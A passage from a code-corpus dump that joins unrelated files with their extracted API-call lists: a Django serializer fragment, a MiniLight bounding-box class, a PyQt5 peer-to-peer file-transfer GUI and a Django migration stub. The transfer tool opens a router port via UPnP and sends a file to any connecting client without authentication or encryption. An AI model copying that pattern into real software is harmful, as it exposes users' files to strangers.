] | [((723, 760), 'rest_framework.serializers.TimeField', 'serializers.TimeField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (744, 760), False, 'from rest_framework import serializers, viewsets\n'), ((776, 813), 'rest_framework.serializers.TimeField', 'serializers.TimeField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (797, 813), False, 'from rest_framework import serializers, viewsets\n'), ((841, 881), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (865, 881), False, 'from rest_framework import serializers, viewsets\n'), ((952, 989), 'rest_framework.serializers.DateField', 'serializers.DateField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (973, 989), False, 'from rest_framework import serializers, viewsets\n'), ((1113, 1153), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {'read_only': '(True)'}), '(read_only=True)\n', (1137, 1153), False, 'from rest_framework import serializers, viewsets\n'), ((521, 611), 'opening_hours.hours.get_opening_hours', 'get_opening_hours', ([], {'resource_id': 'f"""{self.id}"""', 'start_date': 'start_date', 'end_date': 'end_date'}), "(resource_id=f'{self.id}', start_date=start_date, end_date\n =end_date)\n", (538, 611), False, 'from opening_hours.hours import get_opening_hours\n'), ((1504, 1538), 'reservation_units.models.ReservationUnit.objects.get', 'ReservationUnit.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (1531, 1538), False, 'from reservation_units.models import ReservationUnit\n')] |
# MiniLight Python : minimal global illumination renderer
#
# Copyright (c) 2007-2008, <NAME> / HXA7241 and <NAME>.
# http://www.hxa7241.org/
#
# Copyright (c) 2009-2012, <NAME>.
from vector3f import Vector3f, MAX
class Bound(object):
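    # axis-aligned bounding box defined by its lower and upper corner points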
def __init__(self, lower, upper):
self.lower = lower
self.upper = upper
def expand_to_fit(self, bound):
for j in range(3):
if self.lower[j] > bound.lower[j]:
self.lower[j] = bound.lower[j]
if self.upper[j] < bound.upper[j]:
self.upper[j] = bound.upper[j]
def clamp(self):
size = max(list(Vector3f(self.upper) - Vector3f(self.lower)))
self.upper = list(Vector3f(self.upper).clamped(
Vector3f(self.lower) + Vector3f(size), MAX))
def encloses(self, bound):
return (
bound.upper[0] >= self.lower[0] and bound.lower[0] < self.upper[0]
and
bound.upper[1] >= self.lower[1] and bound.lower[1] < self.upper[1]
and
bound.upper[2] >= self.lower[2] and bound.lower[2] < self.upper[2]
)
def within(self, point, tolerance):
return (
(self.lower[0] - point[0] <= tolerance) and
(point[0] - self.upper[0] <= tolerance) and
(self.lower[1] - point[1] <= tolerance) and
(point[1] - self.upper[1] <= tolerance) and
(self.lower[2] - point[2] <= tolerance) and
(point[2] - self.upper[2] <= tolerance)
)
| [
"vector3f.Vector3f"
] | [((634, 654), 'vector3f.Vector3f', 'Vector3f', (['self.upper'], {}), '(self.upper)\n', (642, 654), False, 'from vector3f import Vector3f, MAX\n'), ((657, 677), 'vector3f.Vector3f', 'Vector3f', (['self.lower'], {}), '(self.lower)\n', (665, 677), False, 'from vector3f import Vector3f, MAX\n'), ((706, 726), 'vector3f.Vector3f', 'Vector3f', (['self.upper'], {}), '(self.upper)\n', (714, 726), False, 'from vector3f import Vector3f, MAX\n'), ((748, 768), 'vector3f.Vector3f', 'Vector3f', (['self.lower'], {}), '(self.lower)\n', (756, 768), False, 'from vector3f import Vector3f, MAX\n'), ((771, 785), 'vector3f.Vector3f', 'Vector3f', (['size'], {}), '(size)\n', (779, 785), False, 'from vector3f import Vector3f, MAX\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'gui.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
import os
import socket
import time
import port_forward_3
#from fsplit.filesplit import Filesplit
#fs=Filesplit()
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(425, 455)
MainWindow.setAcceptDrops(True)
MainWindow.setAutoFillBackground(False)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.pushButton = QtWidgets.QPushButton(self.centralwidget)
self.pushButton.setGeometry(QtCore.QRect(310, 129, 91, 73))
self.pushButton.setObjectName("pushButton")
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(30, 130, 281, 71))
self.textEdit.setObjectName("textEdit")
self.label_4 = QtWidgets.QLabel(self.centralwidget)
self.label_4.setGeometry(QtCore.QRect(32, 26, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_4.setFont(font)
self.label_4.setObjectName("label_4")
self.label_5 = QtWidgets.QLabel(self.centralwidget)
self.label_5.setGeometry(QtCore.QRect(32, 113, 220, 13))
self.label_5.setObjectName("label_5")
self.label_6 = QtWidgets.QLabel(self.centralwidget)
self.label_6.setGeometry(QtCore.QRect(32, 6, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_6.setFont(font)
self.label_6.setObjectName("label_6")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(32, 212, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.label_8 = QtWidgets.QLabel(self.centralwidget)
self.label_8.setGeometry(QtCore.QRect(32, 236, 131, 16))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(15)
self.label_8.setFont(font)
self.label_8.setObjectName("label_8")
self.label_9 = QtWidgets.QLabel(self.centralwidget)
self.label_9.setGeometry(QtCore.QRect(32, 284, 381, 20))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_9.setFont(font)
self.label_9.setObjectName("label_9")
self.label_10 = QtWidgets.QLabel(self.centralwidget)
self.label_10.setGeometry(QtCore.QRect(32, 269, 381, 20))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
self.label_11 = QtWidgets.QLabel(self.centralwidget)
self.label_11.setGeometry(QtCore.QRect(32, 248, 480, 31))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_11.setFont(font)
self.label_11.setObjectName("label_11")
self.label_12 = QtWidgets.QLabel(self.centralwidget)
self.label_12.setGeometry(QtCore.QRect(32, 327, 47, 13))
self.label_12.setObjectName("label_12")
self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit.setGeometry(QtCore.QRect(87, 324, 113, 20))
self.lineEdit.setObjectName("lineEdit")
self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_2.setGeometry(QtCore.QRect(87, 352, 113, 20))
self.lineEdit_2.setObjectName("lineEdit_2")
self.label_13 = QtWidgets.QLabel(self.centralwidget)
self.label_13.setGeometry(QtCore.QRect(32, 354, 47, 13))
self.label_13.setObjectName("label_13")
self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_3.setGeometry(QtCore.QRect(87, 380, 113, 20))
self.lineEdit_3.setObjectName("lineEdit_3")
self.label_14 = QtWidgets.QLabel(self.centralwidget)
self.label_14.setGeometry(QtCore.QRect(32, 380, 51, 16))
self.label_14.setObjectName("label_14")
self.pushButton_2 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_2.setGeometry(QtCore.QRect(230, 322, 101, 81))
self.pushButton_2.setObjectName("pushButton_2")
self.label = QtWidgets.QLabel(self.centralwidget)
self.label.setGeometry(QtCore.QRect(32, 32, 371, 41))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
font.setItalic(False)
self.label.setFont(font)
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(self.centralwidget)
self.label_2.setGeometry(QtCore.QRect(32, 62, 291, 41))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
font.setItalic(False)
self.label_2.setFont(font)
self.label_2.setObjectName("label_2")
self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_4.setGeometry(QtCore.QRect(79, 91, 113, 20))
self.lineEdit_4.setObjectName("lineEdit_4")
self.label_3 = QtWidgets.QLabel(self.centralwidget)
self.label_3.setGeometry(QtCore.QRect(32, 48, 371, 41))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
font.setItalic(False)
self.label_3.setFont(font)
self.label_3.setObjectName("label_3")
self.label_15 = QtWidgets.QLabel(self.centralwidget)
self.label_15.setGeometry(QtCore.QRect(32, 300, 390, 20))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_15.setFont(font)
self.label_15.setObjectName("label_15")
self.label_16 = QtWidgets.QLabel(self.centralwidget)
self.label_16.setGeometry(QtCore.QRect(32, 93, 47, 13))
font = QtGui.QFont()
font.setFamily("MS Reference Sans Serif")
font.setPointSize(10)
self.label_16.setFont(font)
self.label_16.setObjectName("label_16")
self.pushButton_3 = QtWidgets.QPushButton(self.centralwidget)
self.pushButton_3.setGeometry(QtCore.QRect(290, 100, 111, 23))
self.pushButton_3.setObjectName("pushButton_3")
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "P2PFileTransfer"))
self.pushButton.setText(_translate("MainWindow", "Send"))
self.pushButton.clicked.connect(self.sendFile)
self.label_4.setText(_translate("MainWindow", "Instructions:"))
self.label_5.setText(_translate("MainWindow", "Drop the file here:"))
self.label_6.setText(_translate("MainWindow", "Send:"))
self.label_7.setText(_translate("MainWindow", "Receive:"))
self.label_8.setText(_translate("MainWindow", "Instructions:"))
self.label_9.setText(_translate("MainWindow", "you just give it a name and extension and you are done!"))
self.label_10.setText(_translate("MainWindow", "sending peer(there are lots of tutorials on internet) then"))
self.label_11.setText(_translate("MainWindow", "For receiving a file you have to paste the public ip of the"))
self.label_12.setText(_translate("MainWindow", "IP:"))
self.label_13.setText(_translate("MainWindow", "Filename:"))
self.label_14.setText(_translate("MainWindow", "extension:"))
self.pushButton_2.setText(_translate("MainWindow", "Receive"))
self.pushButton_2.clicked.connect(self.receiveFile)
self.label.setText(_translate("MainWindow", "Specify the buffer(leave blank for default)(client has to have the same) "))
self.label_2.setText(_translate("MainWindow", "Drop the file and hit send"))
self.label_3.setText(_translate("MainWindow", "have the same buffer)(max suggested buffer 256000) "))
self.label_15.setText(_translate("MainWindow", "remember to specify the same buffer as the server above"))
self.label_16.setText(_translate("MainWindow", "Buffer:"))
self.pushButton_3.setText(_translate("MainWindow", "Localhost"))
self.pushButton_3.clicked.connect(self.localHostClick)
self.localHost=False
def localHostClick(self):
if self.localHost==False:
self.localHost=True
else:
self.localHost=False
self.textEdit.setText("localHost set to: "+str(self.localHost))
def receiveFile(self):
startRecv=time.perf_counter()
bufferStr=self.lineEdit_4.text()
if bufferStr=="":
buffer=32000
else:
buffer=int(bufferStr)
s = socket.socket() # Create a socket object
host = self.lineEdit.text() #Ip address that the TCPServer is there
        port = 25575                   # Reserve a port for your service; every new transfer wants a new port or you must wait.
s.connect((host, port))
welcomemsg="Hello server!"
s.send(bytearray(welcomemsg,"utf-8"))
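        # read the incoming stream in buffer-sized chunks until the sender closes the connection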
with open('received_file', 'wb') as f:
print('file opened')
#self.textEdit.append('receiving data...')
while True:
data = s.recv(buffer)
#print('data=%s', (data))
if not data:
break
# write data to a file
f.write(data)
f.close()
endRecv=time.perf_counter()
finalTimeRecv=endRecv-startRecv
self.textEdit.append('Successfully got the file in '+str(round(finalTimeRecv,3))+"s")
s.close()
print('connection closed')
filename=self.lineEdit_2.text()
ext=self.lineEdit_3.text()
os.rename("received_file",filename+ext)
def sendFile(self):
if self.localHost==False:
openPort = port_forward_3.EnablePort(25575)
#openPort = portforwardlib.forwardPort(25575,25575,"","",False,"TCP","","P2Pfiletranfer","")
else:
            pass
filepath= self.textEdit.toPlainText()
filepath=filepath.replace("file:///","")
bufferStr=self.lineEdit_4.text()
if bufferStr=="":
buffer=32000
else:
buffer=int(bufferStr)
        port = 25575     # Reserve a port for your service; every new transfer wants a new port or you must wait.
s = socket.socket() # Create a socket object
host = "" # Get local machine name
s.bind((host, port)) # Bind to the port
s.listen(5) # Now wait for client connection.
self.textEdit.append('Server listening....')
i=0
while i==0:
conn, addr = s.accept() # Establish connection with client.
self.textEdit.append('Got connection from' + str(addr))
startSend=time.perf_counter()
data = conn.recv(buffer)
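            # the first recv only consumes the client's greeting; the file itself is streamed next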
#self.textEdit.setText('Server received' + str(repr(data)))
filename=filepath #In the same folder or path is this file running must the file you want to tranfser to be
f = open(filename,'rb')
l = f.read(buffer)
#self.textEdit.append('Sending file ')
while (l):
conn.send(l)
l = f.read(buffer)
f.close()
endSend=time.perf_counter()
finalTimeSend=endSend-startSend
self.textEdit.append('Done sending in '+str(round(finalTimeSend,3))+"s")
conn.close()
if self.localHost==False:
closePort=port_forward_3.DisablePort(25575)
else:
xd=1
i=1
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
| [
"PyQt5.QtWidgets.QWidget",
"PyQt5.QtWidgets.QTextEdit",
"port_forward_3.DisablePort",
"PyQt5.QtWidgets.QMainWindow",
"PyQt5.QtWidgets.QLineEdit",
"PyQt5.QtGui.QFont",
"socket.socket",
"port_forward_3.EnablePort",
"PyQt5.QtCore.QMetaObject.connectSlotsByName",
"os.rename",
"time.perf_counter",
"PyQt5.QtCore.QRect",
"PyQt5.QtWidgets.QStatusBar",
"PyQt5.QtWidgets.QLabel",
"PyQt5.QtWidgets.QApplication",
"PyQt5.QtWidgets.QPushButton"
] | [((12811, 12843), 'PyQt5.QtWidgets.QApplication', 'QtWidgets.QApplication', (['sys.argv'], {}), '(sys.argv)\n', (12833, 12843), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((12861, 12884), 'PyQt5.QtWidgets.QMainWindow', 'QtWidgets.QMainWindow', ([], {}), '()\n', (12882, 12884), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((714, 743), 'PyQt5.QtWidgets.QWidget', 'QtWidgets.QWidget', (['MainWindow'], {}), '(MainWindow)\n', (731, 743), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((828, 869), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (849, 869), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1014, 1053), 'PyQt5.QtWidgets.QTextEdit', 'QtWidgets.QTextEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1033, 1053), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1191, 1227), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1207, 1227), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1307, 1320), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1318, 1320), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1505, 1541), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1521, 1541), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1676, 1712), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (1692, 1712), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1791, 1804), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1802, 1804), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1989, 2025), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2005, 2025), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2106, 2119), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2117, 2119), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2304, 2340), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2320, 2340), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2421, 2434), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2432, 2434), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2619, 2655), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2635, 2655), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2736, 2749), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2747, 2749), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2935, 2971), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (2951, 2971), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3053, 3066), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3064, 3066), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3255, 3291), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3271, 3291), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3373, 3386), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3384, 3386), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3575, 3611), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3591, 3611), False, 'from PyQt5 import QtCore, QtGui, 
QtWidgets\n'), ((3749, 3788), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3768, 3788), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3929, 3968), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (3948, 3968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4113, 4149), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4129, 4149), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4289, 4328), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4308, 4328), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4473, 4509), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4489, 4509), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4651, 4692), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4672, 4692), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4841, 4877), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (4857, 4877), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4955, 4968), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4966, 4968), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5177, 5213), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5193, 5213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5293, 5306), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (5304, 5306), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5524, 5563), 'PyQt5.QtWidgets.QLineEdit', 'QtWidgets.QLineEdit', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5543, 5563), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5706, 5742), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (5722, 5742), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5822, 5835), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (5833, 5835), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6051, 6087), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6067, 6087), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6169, 6182), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (6180, 6182), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6371, 6407), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6387, 6407), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6487, 6500), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (6498, 6500), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6693, 6734), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralwidget'], {}), '(self.centralwidget)\n', (6714, 6734), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6943, 6975), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainWindow'], {}), '(MainWindow)\n', (6963, 6975), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((7122, 7171), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainWindow'], {}), '(MainWindow)\n', (7159, 7171), False, 'from PyQt5 import QtCore, 
QtGui, QtWidgets\n'), ((9466, 9485), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (9483, 9485), False, 'import time\n'), ((9638, 9653), 'socket.socket', 'socket.socket', ([], {}), '()\n', (9651, 9653), False, 'import socket\n'), ((10427, 10446), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (10444, 10446), False, 'import time\n'), ((10717, 10759), 'os.rename', 'os.rename', (['"""received_file"""', '(filename + ext)'], {}), "('received_file', filename + ext)\n", (10726, 10759), False, 'import os\n'), ((11381, 11396), 'socket.socket', 'socket.socket', ([], {}), '()\n', (11394, 11396), False, 'import socket\n'), ((906, 936), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(310)', '(129)', '(91)', '(73)'], {}), '(310, 129, 91, 73)\n', (918, 936), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1088, 1118), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(30)', '(130)', '(281)', '(71)'], {}), '(30, 130, 281, 71)\n', (1100, 1118), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1261, 1290), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(26)', '(131)', '(16)'], {}), '(32, 26, 131, 16)\n', (1273, 1290), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1575, 1605), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(113)', '(220)', '(13)'], {}), '(32, 113, 220, 13)\n', (1587, 1605), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1746, 1774), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(6)', '(131)', '(16)'], {}), '(32, 6, 131, 16)\n', (1758, 1774), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2059, 2089), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(212)', '(131)', '(16)'], {}), '(32, 212, 131, 16)\n', (2071, 2089), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2374, 2404), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(236)', '(131)', '(16)'], {}), '(32, 236, 131, 16)\n', (2386, 2404), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2689, 2719), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(284)', '(381)', '(20)'], {}), '(32, 284, 381, 20)\n', (2701, 2719), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3006, 3036), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(269)', '(381)', '(20)'], {}), '(32, 269, 381, 20)\n', (3018, 3036), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3326, 3356), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(248)', '(480)', '(31)'], {}), '(32, 248, 480, 31)\n', (3338, 3356), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3646, 3675), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(327)', '(47)', '(13)'], {}), '(32, 327, 47, 13)\n', (3658, 3675), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3823, 3853), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(324)', '(113)', '(20)'], {}), '(87, 324, 113, 20)\n', (3835, 3853), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4005, 4035), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(352)', '(113)', '(20)'], {}), '(87, 352, 113, 20)\n', (4017, 4035), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4184, 4213), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(354)', '(47)', '(13)'], {}), '(32, 354, 47, 13)\n', (4196, 4213), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4365, 4395), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(87)', '(380)', '(113)', '(20)'], {}), '(87, 380, 113, 20)\n', (4377, 4395), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4544, 4573), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(380)', '(51)', 
'(16)'], {}), '(32, 380, 51, 16)\n', (4556, 4573), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4731, 4762), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(230)', '(322)', '(101)', '(81)'], {}), '(230, 322, 101, 81)\n', (4743, 4762), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4909, 4938), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(32)', '(371)', '(41)'], {}), '(32, 32, 371, 41)\n', (4921, 4938), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5247, 5276), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(62)', '(291)', '(41)'], {}), '(32, 62, 291, 41)\n', (5259, 5276), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5600, 5629), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(79)', '(91)', '(113)', '(20)'], {}), '(79, 91, 113, 20)\n', (5612, 5629), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5776, 5805), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(48)', '(371)', '(41)'], {}), '(32, 48, 371, 41)\n', (5788, 5805), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6122, 6152), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(300)', '(390)', '(20)'], {}), '(32, 300, 390, 20)\n', (6134, 6152), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6442, 6470), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(32)', '(93)', '(47)', '(13)'], {}), '(32, 93, 47, 13)\n', (6454, 6470), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((6773, 6804), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(290)', '(100)', '(111)', '(23)'], {}), '(290, 100, 111, 23)\n', (6785, 6804), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((10840, 10872), 'port_forward_3.EnablePort', 'port_forward_3.EnablePort', (['(25575)'], {}), '(25575)\n', (10865, 10872), False, 'import port_forward_3\n'), ((11882, 11901), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (11899, 11901), False, 'import time\n'), ((12397, 12416), 'time.perf_counter', 'time.perf_counter', ([], {}), '()\n', (12414, 12416), False, 'import time\n'), ((12649, 12682), 'port_forward_3.DisablePort', 'port_forward_3.DisablePort', (['(25575)'], {}), '(25575)\n', (12675, 12682), False, 'import port_forward_3\n')] |
# Generated by Django 2.2.5 on 2020-01-05 14:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0018_user_stripe_customer_id'),
]
operations = [
migrations.AlterModelOptions(
name='guest',
